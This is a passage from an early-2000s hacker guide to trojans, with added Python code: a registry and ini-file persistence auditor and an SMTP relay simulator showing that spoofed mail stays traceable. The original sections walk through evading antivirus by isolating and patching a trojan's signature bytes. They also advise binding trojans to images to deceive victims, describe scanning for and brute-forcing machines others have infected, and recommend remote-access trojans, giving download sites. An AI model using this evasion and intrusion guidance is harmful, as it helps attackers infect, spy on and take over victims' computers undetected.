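    """Return (severity, location, detail) findings for the keys listed above."""
    findings = []
    by_lower = {k.lower(): v for k, v in reg.items()}
    for key in COMMAND_KEYS:
        values = by_lower.get(key.lower())
        if values is None:
            continue                                  # key not in this export
        command = values.get("(Default)", "")
        if command != EXPECTED_COMMAND:
            findings.append(("ALERT", key, "open command is %r, expected %r"
                             % (command, EXPECTED_COMMAND)))
    for key in RUN_KEYS:
        for name, command in by_lower.get(key.lower(), {}).items():
            findings.append(("REVIEW", key, "%s -> %s" % (name, command)))
    return findings


def ini_value(text: str, section: str, key: str) -> str:
    """Fetch key= from [section] of an .ini file; '' when absent or empty."""
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
        elif current == section.lower() and "=" in line:
            k, _, v = line.partition("=")
            if k.strip().lower() == key.lower():
                return " ".join(v.split())            # collapse padding that hides a name far right
    return ""


def audit_ini(win_ini: str, system_ini: str) -> list:
    """Apply the win.ini run=/load= and system.ini shell= checks from the text."""
    findings = []
    for key in ("run", "load"):
        value = ini_value(win_ini, "windows", key)
        if value:
            findings.append(("REVIEW", "win.ini [windows] %s=" % key, value))
    shell = ini_value(system_ini, "boot", "shell")
    if shell.lower() != "explorer.exe":
        findings.append(("ALERT", "system.ini [boot] shell=", shell))
    return findings


def audit_all(reg_text: str, win_ini: str, system_ini: str) -> list:
    return audit_registry(parse_reg_export(reg_text)) + audit_ini(win_ini, system_ini)


# Constructed samples.  The Run value and the altered exefile command mirror the
# examples in the text; "ExampleUpdater" is a made-up benign-looking entry.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Server"="C:\\WINDOWS\\server.exe"
"ExampleUpdater"="C:\\Program Files\\Example\\updater.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"server.exe %1\" %*"

[HKEY_CLASSES_ROOT\comfile\shell\open\command]
@="\"%1\" %*"
'''
SAMPLE_WIN_INI = r'''[windows]
load=
run=                                                  C:\WINDOWS\server.exe
'''
SAMPLE_SYSTEM_INI = r'''[boot]
shell=explorer.exe                                    C:\WINDOWS\server.exe
'''

if __name__ == "__main__":
    for severity, where, detail in audit_all(SAMPLE_REG, SAMPLE_WIN_INI, SAMPLE_SYSTEM_INI):
        print("%-6s %s: %s" % (severity, where, detail))
```

Entries marked REVIEW are not verdicts; they are the list the text tells you to scroll through, with the padding that hides a name far to the right already collapsed.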



-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,D =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

What is a firewall?

A firewall is any one of several ways of protecting one network or computer from another untrusted network or 
computer. The actual mechanism whereby this is accomplished varies widely, but in principle, the firewall can be 
thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit
traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,E =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Binders

There's not much to say about these.
Binders are used to bind your trojan .exe with another .exe, .jpeg or other phile you choose. This can help with 
the stealth the servers have. You can use a binder to bind a trojan with a picture and then give them the end 
product and they will not suspect a thing.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,F =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Making your trojan undetected by AVs

I read this at sinred a while back and thought it's worth saying in here as well.

You will need:
your trojan server
a phile splitter
a hex editor

Create a directory and place your trojan server.exe in it
Run AV over the directory and it will spot the .exe as a virus
Use the file splitter to cut your exe into separate 1mb sections
Run AV over the directory and it will spot one of the files as a virus
delete the others.
keep splitting the (now 1mb) partial.exe into smaller sections till you get it really small and still triggering the
antivirus.
when it's about 24 bytes start deleting the last byte and running AV - then deleting the next last byte and running
AV ... till AV fails to recognise it
... 93 05 B4 4A CD 21 <- Spotted as trojan
... 93 05 B4 4A CD <- Spotted as trojan
... 93 05 B4 4A <- NOT spotted as trojan
replace the last byte
... 93 05 B4 4A CD

Now let's trim the starting bytes the same way - one at a time till no longer recognised as a trojan

22 23 51 8C DB 8E C3 ... <- Spotted as trojan
23 51 8C DB 8E C3 ... <- Spotted as trojan
51 8C DB 8E C3 ... <- Spotted as trojan
8C DB 8E C3 <- NOT Spotted as trojan
replace the last byte you removed
51 8C DB 8E C3 ... 93 05 B4 4A CD

now you should have the smallest number of bytes (maybe about 12) that the AV program will recognise as being the
trojan. Congratulations, you just found the viral signature.
now - let's find where that sequence of bytes occurs in the original .exe - let's say at offset 0D98:0348
load your server.exe into Microsoft's 'debug' program with the DOS command 'debug server.exe' and go to that offset,
then press U to unassemble the bytes.

51 8C DB 8E C3 8B 1E 93 05 B4 4A CD
0D98:0348 51 PUSH CX
0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX
0D98:034D 8B1E9305 MOV BX,[0593]
0D98:0351 B44A MOV AH,4A
0D98:0353 CD21 INT 21

Look at the instructions - PUSH CX pushes the CX register onto the stack, and the following instruction MOV BX,DS
doesn't alter CX -or- the stack - it is fairly safe to assume we can swap these two instructions and hopefully it
won't make a difference to the execution of the program - so let's do that. So..

we hexedit '51 8C DB 8E C3'
0D98:0348 51 PUSH CX
0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX
so that it becomes '8C DB 51 8E C3'
0D98:0348 8CDB MOV BX,DS
0D98:034A 51 PUSH CX
0D98:034B 8EC3 MOV ES,BX

And save our new server.exe
Since we have switched a few bytes in the signature it will no longer register as a trojan on our AV. Test it to
make sure it still works as expected - it should if you are careful about which two instructions you switch.
Also remember that only one byte of the signature needs to change - so don't worry if one of the instructions you
chose is partially or even completely outside of the signature bytes - as long as it results in some change within
the signature.
NOTES:
Not all antivirus programs use the same set of bytes for a signature - so check your new file against other popular
AV programs too, and repeat the process if required, till ALL common AV programs fail to report the file.
You may also need to do the same with any supporting .DLLs that the server installs on the remote, as these
normally have telltale signatures too. Once you have a new version DON'T post it - if it is widely distributed it
will eventually find its way onto the AV vendors' lists as a 'new strain' - treat this as a PERSONAL version, and
it will last you long into the future.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,G =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Accessing other infected computers

If you can't be bothered to infect your own victim, then you'll have to search for other people's hard work :)
One way to get an infected PC is to use a portscanner with the option to scan a range of IPs and check the
ports that are open for different types of trojan. Most trojan clients have their own port scanner, but they only
search for their server :( Once you've found yourself an IP and port it's time to connect. Most of the time the
server will be password protected, so you'll have to get yourself a trojan cracker which can do bruteforce and
(or) wordlist attacks. NOTE: scanning can take hours, it's a tricky process but it's worth doing.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Commonly used trojans

Some commonly used trojans are: 

Netbus
NetBus Pro has many features for remote administration like the File manager, Registry manager and Application
Redirect. In addition, NetBus Pro brings you features like Capture screen, Listen keyboard and Capture camera 
image for spying. All these features, among several others, are migrated into a single package. NetBus Pro consists
of a server and a client-part. The server-part is the program which must be operating on the computer you wish 
to administrate. The client-part is the program you use to connect to another computer. Indeed, you don’t even
need the NetBus Pro client available to access your computer today. With the built-in Telnet Server and HTTP
Server, you can access your MS-DOS-prompt and your files with just a Telnet-program and/or web-browser! Two
or more clients can be connected to a NetBus Pro server at a time without any conflicts.

Backorifice
This is like the daddy of all trojans, just like netbus. It's got all the common options as well as extras. It's well
worth downloading! - www.cultdeadcow.com

Sub7
wow, this trojan keeps on getting better and better, it's a good download. - www.sub7.slak.org

Mosucker
MoSucker was written in Visual Basic 6.0 Enterprise Edition. The sourcecode has about 16,000 lines, most of this 
stuff was written by me, but I also used some code from PlanetSourceCode, the greatest page on the net!
MoSucker uses a direct TCP protocol to connect, I think this has become a very nice one, it is very fast and 
processes packets like they were sent, not like they arrive (oh yeah i'm sure you'll understand me if you already
worked with windows sockets *g). Client, Server and ServerCreator run on all currently available 32bit versions of
Windows, this means: 95, 98, 98SE, ME, NT and 2000. - www.infernoindustries.cjb.net

Bionet
BioNet has the most efficient server available today.
With its own unique file transfer protocol making transfers up to 90% faster.
BioNet has its own unique encryption engine making it one of the safest in the world.

We were the first to bring you functions such as 
ICQ notify , Flip VDU , Delayed Server Execution, Keylog Emailer , and more.

With release 12 we are THE ONLY trojan currently to have a custom CGI notify.
We are the only trojan to use an automated email to send you all offline keystrokes when the server comes online.
No longer do you have to rely on ICQ to tell you when they are on
and no longer do you have to wait for them to come online to download their logs.

With broadband coming more widely available the new bionet 3 engine has the capacity
to provide a stable platform for high speed data connections with multi threaded file transfer
and realtime streaming media.
This is where you will see many other existing trojans fail to cope. - bionet.tlsecurity.com
This is the most advanced GUI trojan yet.

GirlFriend 
GirlFriend is a program which allows you to get information on applications
running on a remote PC. That means that if any computer connected to the net
is infected with GirlFriend, you can connect to this PC and "steal" such
information as:
  - text, that "infected" user enters to any window containing password
field;
  - passwords, which "infected" user enters to password fields.
You also can:
  - send "system" messages to remote PC;
  - play sounds;
  - show bitmaps (.bmp pictures);
  - run exe files;
  - send "victim" to any URL;
  - change server's port;
  - hide GF Client with BOSSKEY=F12;
  - scan subnet for infected servers;
  - save windows list;
  - work with files and folders using GF filemanager.

Y3K Rat
Y3K Rat is a remote administration tool, which controls a remote computer. - www.y3knetwork.org


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Trojans I use

I don't use them much anymore, but I use:

Tini server, this is a very small telnet server and is the best one I've ever seen.
Mosucker, this is such a cool trojan, though I haven't used it in a while.
Total Eclypse, this FTP trojan is old but still very good.
Bionet, the most advanced trojan I've seen yet; it's worth using if you want to get into trojaning.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Sending anonymous emails

First telnet to port 25 of a mail server, as 25 is the SMTP port (port 19 is chargen, not mail). Here's an
example of the banner that comes up: 

220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP) [d/o/u/g] ready
at Thu, 10 Oct 96 00:03:17 -500 (CDT) 

Most servers expect you to introduce yourself before anything else, so first you type:

HELO yourhost

it says:

250 mail.airmail.net (the exact wording varies from server to server)

Keep in mind that "anonymous" here only means the From: line is whatever you typed. The server logs the
connection and stamps your real IP address into a Received: header that the recipient, and the server's abuse
desk, can read.

then you type: 

mail from:whoever@wherever.com (this is who you're saying it is from)

it says: 

250 <whoever@wherever.com> ... Sender Okay 

then you type: 

rcpt to:somebody@somewhere.com (this is who you're sending it to)

it says: 

250 <somebody@somewhere.com> ... Recipient Okay 

then you type: 

data 

it says: 

354 Enter mail, end with "." on a line by itself 

you type: 

To: somebody@somewhere.com 
From: whoever@wherever.com 
Subject: The Subject 

Say whatever you want here. (The blank line above separates the headers from the body; without it the
server treats your first line of text as part of the headers.) If you mess up and need to change a line
above the one you're working on, don't try to fix it: the server won't let you, and the message goes out
with the mistake in it. A body line that itself starts with a "." must be typed with an extra leading "."
or the server takes it as the end of the message.
. 
(the lone "." on a line by itself tells the server that you are done) 

it says: 

250 Mail accepted 

then you type: 

quit


OK, now a recap of just what you type:

HELO yourhost
MAIL FROM:whoever@wherever.com
RCPT TO:someone@somewhere.com
DATA
From: whoever@wherever.com (Name)
To: someone@somewhere.com
Subject: Whatever
Reply-To: whoever@wherever.com

Your message....
.
QUIT
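The exchange above, run end to end as an added example that is not part of the original text: a Python script
that builds the client side (HELO, MAIL FROM, RCPT TO, DATA, the lone ".", QUIT, with the extra-dot rule for body
lines that start with a period), drives it against a small in-process stand-in for an open relay, and then reads
back the Received: header the relay stamps on the delivered message. The hostnames, addresses and client IP in it
are constructed, and FakeRelay is a deliberate simplification of a real MTA, not any particular server's code.

```python
"""Added example (not from the original text): the SMTP exchange above, simulated end
to end against an in-process stand-in for an open relay. Hostnames, addresses and the
client IP are constructed; FakeRelay is a simplification, not a real MTA."""
import re


def dot_stuff(body_lines):
    """RFC 5321 transparency: a body line that starts with '.' is sent with an extra
    leading '.', so the relay does not mistake it for the end-of-data marker."""
    return ["." + ln if ln.startswith(".") else ln for ln in body_lines]


def build_commands(helo, mail_from, rcpt_to, headers, body_lines):
    """The client's lines, in order: envelope, then headers + blank line + body, '.', QUIT."""
    payload = headers + [""] + dot_stuff(body_lines) + ["."]
    return ([f"HELO {helo}", f"MAIL FROM:<{mail_from}>", f"RCPT TO:<{rcpt_to}>", "DATA"]
            + payload + ["QUIT"])


class FakeRelay:
    """Tiny state machine playing the relay. It accepts any sender and recipient,
    as the relays listed below once did, but it still records who connected."""

    def __init__(self, hostname, client_ip):
        self.hostname, self.client_ip = hostname, client_ip
        self.helo, self.sender, self.rcpts = None, None, []
        self.in_data, self.data_lines, self.delivered = False, [], []

    def feed(self, line):
        """Handle one client line; return the reply, or None while swallowing DATA lines."""
        if self.in_data:
            if line != ".":
                self.data_lines.append(line)
                return None
            self.in_data = False
            # Every relay stamps the connecting address here; this is what makes the
            # "anonymous" mail traceable to the sender's machine.
            received = (f"Received: from {self.helo or 'unknown'} ([{self.client_ip}]) "
                        f"by {self.hostname} with SMTP")
            body = [ln[1:] if ln.startswith("..") else ln for ln in self.data_lines]  # un-stuff
            self.delivered.append("\n".join([received] + body))
            self.data_lines = []
            return "250 Mail accepted"
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            self.helo = arg.strip()
            return f"250 {self.hostname}"
        if verb == "MAIL":
            self.sender = arg.split(":", 1)[1].strip().strip("<>")
            return f"250 <{self.sender}> ... Sender Okay"
        if verb == "RCPT":
            if self.sender is None:
                return "503 need MAIL FROM first"
            rcpt = arg.split(":", 1)[1].strip().strip("<>")
            self.rcpts.append(rcpt)
            return f"250 <{rcpt}> ... Recipient Okay"
        if verb == "DATA":
            if not self.rcpts:
                return "503 need RCPT TO first"
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        if verb == "QUIT":
            return f"221 {self.hostname} closing connection"
        return "500 command unrecognized"


def run_session(relay, commands):
    """Feed the client lines to the relay and return the (client, server) transcript."""
    return [(cmd, relay.feed(cmd)) for cmd in commands]


def received_ips(message):
    """IPs a relay stamped into Received: headers, i.e. what the recipient sees."""
    return re.findall(r"^Received:.*?\[(\d{1,3}(?:\.\d{1,3}){3})\]", message, re.M)


def demo():
    relay = FakeRelay("mail.example.net", "203.0.113.7")  # constructed names/addresses
    cmds = build_commands("myhost", "whoever@wherever.com", "somebody@somewhere.com",
                          ["From: whoever@wherever.com", "To: somebody@somewhere.com",
                           "Subject: The Subject"],
                          ["Say whatever you want here", ".this line starts with a dot"])
    transcript = run_session(relay, cmds)
    return transcript, relay.delivered[0]


if __name__ == "__main__":
    transcript, msg = demo()
    for client_line, reply in transcript:
        print("C:", client_line)
        if reply:
            print("S:", reply)
    print("\nDelivered message:\n" + msg)
    print("\nIPs exposed in Received:", received_ips(msg))
```

Run it and compare the "C:" lines with the recap above; the delivered message shows the body line that began
with a dot arriving intact, and the last line prints the connecting IP that the relay wrote into Received:,
which is the part of the message the typed From: line never hides.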

Here are a few servers that relayed mail for anyone when this list was put together (the banner above is dated
1996). Open relays get blocklisted and shut down quickly, so expect most of these to refuse RCPT TO for outside
addresses now:

mail.airmail.net:25 
mail.geocities.com:25 
mnsi.net:25 
hacker.com:25 
mail.iaw.on.ca:25 
pdx.sisna.com:25 
jaring.my:25 
chollian.dacom.co.kr:25 
all-yours.net:25 
plix.com:25 
ids.net:25 
student.uq.edu.au:25 
istar.ca:25 
total.net:25 
mail.tfs.net:25 
ecis.com:25 
mindspring.com:25 
popmail.uc.edu:25 
mail.atcon.com:25 
future.net:25 
aloha.net:25 
ovnet.com:25 
connect.reach.net:25 
valley-internet.net:25 
valleynet.com:25 
milo.cfw.com:25 
scs.august.com:25 
hiwaay.net:25 
clandjop.com:25 
unix.diisd.k12.mi.us:25 
erie.net:25 
voyager.net:25 
awod.com:25 
netforward.com:25 
netcreations.com:25 
mail.wantree.com.au:25 
ns.net:25 
microserve.net:25 
wbs.net:25 
hwg.org:25 
eff.org:25 
europe.std.com:25 
misty.com:25 
succeed.net:25 
mail.discovery.com:25 
cnet.com:25 
nytimes.com:25 
w3.org:25 
mail.audionet.com:25 
mit.edu:25


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,D =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Where to get them from:

www.sinred.com
www.tlsecurity.com
www.y3knetwork.org
bionet.tlsecurity.com
www.infernoindustries.cjb.net
www.sub7.slak.org
www.cultdeadcow.com

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,E =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Contacting me

Well, that's it folks. If I've missed anything out, you have some comments, suggestions or death threats :( then
please contact me at etc_passwd01@yahoo.co.uk - I hope it's been informative and helpful, if not just a bit of reading to fill up your spare time, and I hope you can use this to have some phun!

g33t$ goto:

D41MG3 - If you're still out there - www.acidrox.co.uk
fly_doggz - fdh
binary_fision - liquid_phire
g_h_o_s_t_hax0r 
redhedghog 
and all the other cool peeps I've come across while I was on my travels.

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

                -=  Copyright 2000 - 2001 =-
               -= expl0it_shad0w of c-cure™ =-
                        -= p£@c£. =-

